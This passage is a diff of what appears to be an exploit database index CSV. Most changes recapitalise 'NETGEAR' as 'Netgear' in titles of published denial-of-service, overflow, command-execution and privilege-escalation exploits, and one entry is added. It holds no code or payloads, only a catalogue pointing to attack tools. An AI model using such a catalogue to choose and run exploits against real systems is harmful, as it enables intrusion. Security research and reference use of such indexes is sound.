8125,exploits/hardware/dos/8125.py,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",dos,hardware, 8129,exploits/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",dos,windows, 8135,exploits/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,dos,windows, @@ -1077,7 +1077,7 @@ id,file,description,date,author,type,platform,port 8955,exploits/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - 'syslog' Denial of Service",2009-06-15,h00die,dos,linux, 8957,exploits/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",dos,multiple, 8960,exploits/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,dos,linux, -8964,exploits/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware, +8964,exploits/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware, 8971,exploits/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,dos,windows, 8976,exploits/multiple/dos/8976.pl,"Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service",2009-06-17,RSnake,dos,multiple, 8982,exploits/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,dos,linux, @@ -2819,7 +2819,7 @@ id,file,description,date,author,type,platform,port 22401,exploits/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",dos,windows, 22402,exploits/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC)",2012-11-01,coolkaveh,dos,windows, 22406,exploits/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",dos,linux, -22407,exploits/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware, +22407,exploits/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware, 22415,exploits/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",dos,hardware, 22417,exploits/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",dos,windows, 22419,exploits/php/dos/22419.php,"PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow",2003-03-25,"Sir Mordred",dos,php, @@ -3560,7 +3560,7 @@ id,file,description,date,author,type,platform,port 27764,exploits/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",dos,linux, 27765,exploits/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",dos,linux, 27856,exploits/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",dos,linux, -27775,exploits/hardware/dos/27775.py,"NETGEAR ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware, +27775,exploits/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware, 27778,exploits/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,dos,linux,139 27790,exploits/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,dos,osx, 27791,exploits/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,dos,linux, @@ -4110,7 +4110,7 @@ id,file,description,date,author,type,platform,port 32551,exploits/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,dos,linux, 32573,exploits/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,dos,windows, 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple, -32583,exploits/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware, +32583,exploits/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware, 32587,exploits/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,dos,windows, 32596,exploits/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",dos,multiple, 32657,exploits/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,dos,windows, @@ -10046,7 +10046,7 @@ id,file,description,date,author,type,platform,port 40323,exploits/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,local,windows, 40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",local,windows, 40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,local,windows, -40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows, +40442,exploits/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows, 40443,exploits/windows/local/40443.txt,"Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows, 40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",local,linux, 40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64, @@ -11075,7 +11075,7 @@ id,file,description,date,author,type,platform,port 48397,exploits/windows/local/48397.txt,"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)",2020-04-29,Vulnerability-Lab,local,windows, 48398,exploits/windows/local/48398.txt,"EmEditor 19.8 - Insecure File Permissions",2020-04-29,SajjadBnd,local,windows, 48400,exploits/windows/local/48400.txt,"Druva inSync Windows Client 6.5.2 - Local Privilege Escalation",2020-04-29,"Chris Lyne",local,windows, -48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows, +48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows, 48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows, 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows, 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows, @@ -11094,6 +11094,7 @@ id,file,description,date,author,type,platform,port 48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows, 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, +48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -12180,7 +12181,7 @@ id,file,description,date,author,type,platform,port 7630,exploits/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,remote,windows, 7701,exploits/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,remote,linux,445 7706,exploits/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,remote,windows, -7712,exploits/hardware/remote/7712.txt,"NETGEAR WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware, +7712,exploits/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware, 7739,exploits/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method",2009-01-12,"Alfons Luja",remote,windows, 7747,exploits/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows, 7748,exploits/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows, @@ -12319,7 +12320,7 @@ id,file,description,date,author,type,platform,port 8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",remote,windows, 8934,exploits/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,remote,windows, 8938,exploits/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - 'URL' Remote Buffer Overflow",2009-06-12,seer[N.N.U],remote,windows, -8963,exploits/hardware/remote/8963.txt,"NETGEAR DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware, +8963,exploits/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware, 8969,exploits/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,remote,windows, 8970,exploits/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,remote,windows, 8986,exploits/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,remote,windows, @@ -12352,7 +12353,7 @@ id,file,description,date,author,type,platform,port 9456,exploits/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,remote,hardware, 9468,exploits/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,remote,windows,69 9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware, -9498,exploits/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware, +9498,exploits/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware, 9500,exploits/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,remote,windows, 9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",remote,hardware, 9508,exploits/windows/remote/9508.rb,"ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,remote,windows, @@ -12896,7 +12897,7 @@ id,file,description,date,author,type,platform,port 16383,exploits/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,remote,windows, 16384,exploits/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, 16385,exploits/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, -16388,exploits/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware, +16388,exploits/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware, 16389,exploits/windows/remote/16389.rb,"Omni-NFS Server - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, 16390,exploits/windows/remote/16390.rb,"Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)",2010-09-20,Metasploit,remote,windows, 16391,exploits/windows/remote/16391.rb,"EMC AlphaStor Agent - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, @@ -14792,7 +14793,7 @@ id,file,description,date,author,type,platform,port 22224,exploits/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",remote,multiple, 22226,exploits/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",remote,windows, 22229,exploits/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",remote,windows, -22236,exploits/hardware/remote/22236.txt,"NETGEAR FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware, +22236,exploits/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware, 22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",remote,hardware, 22251,exploits/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Remote Buffer Overflow",2006-09-28,RoMaNSoFt,remote,multiple, 22264,exploits/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",remote,linux, @@ -14848,9 +14849,9 @@ id,file,description,date,author,type,platform,port 22448,exploits/windows/remote/22448.txt,"BEA WebLogic 7.0 - Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",remote,windows, 22449,exploits/unix/remote/22449.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,remote,unix, 22450,exploits/unix/remote/22450.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,remote,unix, -22453,exploits/hardware/remote/22453.txt,"NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware, +22453,exploits/hardware/remote/22453.txt,"Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware, 22454,exploits/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",remote,linux, -22455,exploits/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware, +22455,exploits/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware, 22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple, 22466,exploits/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Remote Stack Overflow ROP-Based (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",remote,windows, 22468,exploits/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,remote,unix, @@ -15302,7 +15303,7 @@ id,file,description,date,author,type,platform,port 24133,exploits/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,remote,windows, 24136,exploits/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",remote,linux, 24137,exploits/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",remote,multiple, -24140,exploits/hardware/remote/24140.txt,"NETGEAR RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware, +24140,exploits/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware, 24148,exploits/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",remote,multiple, 24149,exploits/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,remote,php, 24187,exploits/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,remote,windows, @@ -15469,7 +15470,7 @@ id,file,description,date,author,type,platform,port 24904,exploits/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,windows, 24905,exploits/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,multiple, 24907,exploits/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",remote,windows, -24931,exploits/hardware/remote/24931.rb,"NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware, +24931,exploits/hardware/remote/24931.rb,"Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware, 24935,exploits/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux, 24936,exploits/hardware/remote/24936.rb,"Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-04-08,Metasploit,remote,hardware, 24937,exploits/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux, @@ -15486,7 +15487,7 @@ id,file,description,date,author,type,platform,port 24961,exploits/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,remote,windows, 24963,exploits/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",remote,multiple,50000 25091,exploits/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",remote,multiple, -24974,exploits/hardware/remote/24974.rb,"NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware, +24974,exploits/hardware/remote/24974.rb,"Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware, 24976,exploits/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,remote,multiple, 24979,exploits/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",remote,multiple, 24980,exploits/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple, @@ -15942,14 +15943,14 @@ id,file,description,date,author,type,platform,port 29035,exploits/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,remote,windows, 29045,exploits/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",remote,windows, 29083,exploits/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",remote,windows, -29096,exploits/windows/remote/29096.rb,"NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows, +29096,exploits/windows/remote/29096.rb,"Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows, 29127,exploits/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,remote,hardware,80 29129,exploits/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,remote,windows,12397 29130,exploits/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,remote,windows,8080 29132,exploits/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,remote,unix,80 29160,exploits/linux/remote/29160.c,"GNU Tar 1.1x - 'GNUTYPE_NAMES' Directory Traversal",2006-11-21,"Teemu Salmela",remote,linux, 29146,exploits/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",remote,windows, -29167,exploits/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows, +29167,exploits/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows, 29171,exploits/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,remote,windows, 29210,exploits/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,remote,php,80 29273,exploits/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,remote,hardware,8080 @@ -16034,7 +16035,7 @@ id,file,description,date,author,type,platform,port 29807,exploits/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Remote Buffer Overflow",2007-03-31,"Stefan Esser",remote,php, 29808,exploits/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",remote,php, 29814,exploits/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",remote,windows, -29815,exploits/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443 +29815,exploits/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443 29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple, 29952,exploits/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,remote,windows, 29840,exploits/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",remote,windows, @@ -16151,7 +16152,7 @@ id,file,description,date,author,type,platform,port 30645,exploits/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",remote,windows, 30650,exploits/hardware/remote/30650.txt,"Linksys SPA941 - 'SIP From' HTML Injection",2007-10-09,"Radu State",remote,hardware, 30652,exploits/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",remote,hardware, -30673,exploits/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware, +30673,exploits/hardware/remote/30673.txt,"Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware, 30677,exploits/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection",2007-10-16,"Humberto J. Abdelnur",remote,linux, 30678,exploits/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",remote,multiple, 30692,exploits/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,remote,windows, @@ -16525,7 +16526,7 @@ id,file,description,date,author,type,platform,port 33164,exploits/multiple/remote/33164.txt,"WebKit - Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,remote,multiple, 33165,exploits/hardware/remote/33165.txt,"2WIRE Routers - 'CD35_SETUP_01' Access Validation",2009-08-12,hkm,remote,hardware, 33172,exploits/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",remote,windows, -33177,exploits/hardware/remote/33177.txt,"NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware, +33177,exploits/hardware/remote/33177.txt,"Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware, 33192,exploits/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",remote,multiple, 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple, 33207,exploits/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Remote Buffer Overflow",2009-09-01,"optix hacker",remote,windows, @@ -16941,7 +16942,7 @@ id,file,description,date,author,type,platform,port 35806,exploits/windows/remote/35806.c,"Poison Ivy 2.3.2 - Remote Buffer Overflow",2011-05-27,"Kevin R.V",remote,windows, 35809,exploits/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,remote,windows, 35810,exploits/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",remote,linux, -35817,exploits/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware, +35817,exploits/hardware/remote/35817.txt,"Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware, 35818,exploits/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Cross-Site Scripting",2011-06-01,"Stefan Schurtz",remote,multiple, 35822,exploits/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",remote,windows, 35836,exploits/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,remote,linux, @@ -17326,7 +17327,7 @@ id,file,description,date,author,type,platform,port 39074,exploits/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution",2014-02-03,"Josue Rojas",remote,cgi, 39105,exploits/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow",2014-02-19,"Julien Ahrens",remote,windows, 39104,exploits/multiple/remote/39104.py,"Dassault Systemes Catia - Remote Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",remote,multiple, -39089,exploits/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware, +39089,exploits/hardware/remote/39089.txt,"Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware, 39102,exploits/windows/remote/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,remote,windows, 39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security 